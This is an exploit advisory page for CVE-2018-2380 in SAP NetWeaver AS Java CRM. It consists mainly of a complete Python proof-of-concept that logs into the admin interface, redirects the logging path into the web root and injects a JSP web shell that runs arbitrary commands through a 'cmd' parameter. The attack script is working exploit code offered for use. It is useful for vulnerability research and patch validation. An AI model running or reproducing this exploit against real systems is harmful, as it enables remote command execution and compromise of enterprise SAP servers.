SAP NetWeaver AS JAVA CRM Remote Command Execution

2018.03.14
Credit: erpscanteam
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/env python import argparse import urllib import requests, random from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) help_desc = ''' PoC of Remote Command Execution via Log injection on SAP CRM -- ERPScan python crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true ''' baner = ''' _______ _______ _______ _______ _______ _______ _ ( ____ \( ____ )( ____ )( ____ \( ____ \( ___ )( ( /| | ( \/| ( )|| ( )|| ( \/| ( \/| ( ) || \ ( | | (__ | (____)|| (____)|| (_____ | | | (___) || \ | | | __) | __)| _____)(_____ )| | | ___ || (\ \) | | ( | (\ ( | ( ) || | | ( ) || | \ | | (____/\| ) \ \__| ) /\____) || (____/\| ) ( || ) \ | (_______/|/ \__/|/ \_______)(_______/|/ \||/ )_) Vahagn @vah_13 Vardanian Bob @NewFranny CVE-2018-2380 ''' def start(ip, port, username, password, sid, ssl): if ssl == None: base_scheme = 'http' else: base_scheme = 'https' req_adapter = requests.session() _server_ip_port = "{0}:{1}".format(ip, port) _username = username admin_password = password _headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Referer": "{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1".format( base_scheme,_server_ip_port) } # shell name _shell_name = "ERPScan_shell_{0}".format(random.randint(1337, 31337)) # shell_code shell_code = ''' <%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> ''' # urls variables _irj_portal = "{0}://{1}/irj/portal".format(base_scheme,_server_ip_port) _b2b_admin_url = "{0}://{1}/b2b/admin/index.jsp".format(base_scheme,_server_ip_port) _url_of_log_path = "{0}://{1}/b2b/admin/logging.jsp".format(base_scheme,_server_ip_port) _url_write_shell_to_log_file = "{0}://{1}/b2b/init.do?\"%22]{2}[%22\"".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code)) # data variable _post_data_restore_log_path = {"selConfigName": "com.sap.isa", "selSeverity": "0", "selDest": "./default_log_name.log", "selLimit": "10485760", "selCount": "20", "selFormatterType": "ListFormat", "selPattern": "none", "mode": "save", "selLocationIdx": "1"} _post_data_to_change_log_path = {"selConfigName": "com.sap.isa", "selSeverity": "0", "selDest": "C:\\usr\\sap\\{0}\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\_default\\root\\{1}.jsp".format(sid, _shell_name), "selLimit": "10485760", "selCount": "20", "selFormatterType": "ListFormat", "selPattern": "none", "mode": "save", "selLocationIdx": "1"} print("{0} \n[!] Try to get RCE using log injection ".format(baner)) print("[!] Get j_salt token for requests") res = requests.get(_irj_portal, headers=_headers, verify=False) soup = BeautifulSoup(res.text, "html.parser") e = soup.find("input", {"name": "j_salt"}) __j_salt = e['value'] print("[!] Login to the SAP portal") req_adapter.post(_b2b_admin_url, headers=_headers, data={"login_submit": "on", "login_do_redirect": "1", "j_salt": __j_salt, "j_username": "{0}".format(_username), "j_password": "{0}".format(admin_password), "uidPasswordLogon": "Log On"}, verify=False) print("[!] Change log path ") req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path) print("[!] Upload \"Runtime.getRuntime().exec(request.getParameter(\"cmd\")) \" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig".format(base_scheme,_server_ip_port, _shell_name)) req_adapter.get(_url_write_shell_to_log_file, headers=_headers) print("[!] Restore logs path to ./default_log_name.log") req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path) print("[!] Enjoy!") if __name__ == "__main__": parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to') parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port') parser.add_argument('-u', '--username', help='SAP CRM administrator') parser.add_argument('-pwd', '--password', help='SAP CRM administrator password') parser.add_argument('-s', '--SID', help='SAP SID') parser.add_argument('-S', '--ssl', help='Use ssl connection') args = parser.parse_args() args_dict = vars(args) host = args_dict['host'] port = args_dict['port'] username = args_dict['username'] password = args_dict['password'] sid = args_dict['SID'] ssl = args.ssl start(host, port, username, password, sid, ssl)

References:

https://github.com/erpscanteam/CVE-2018-2380


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top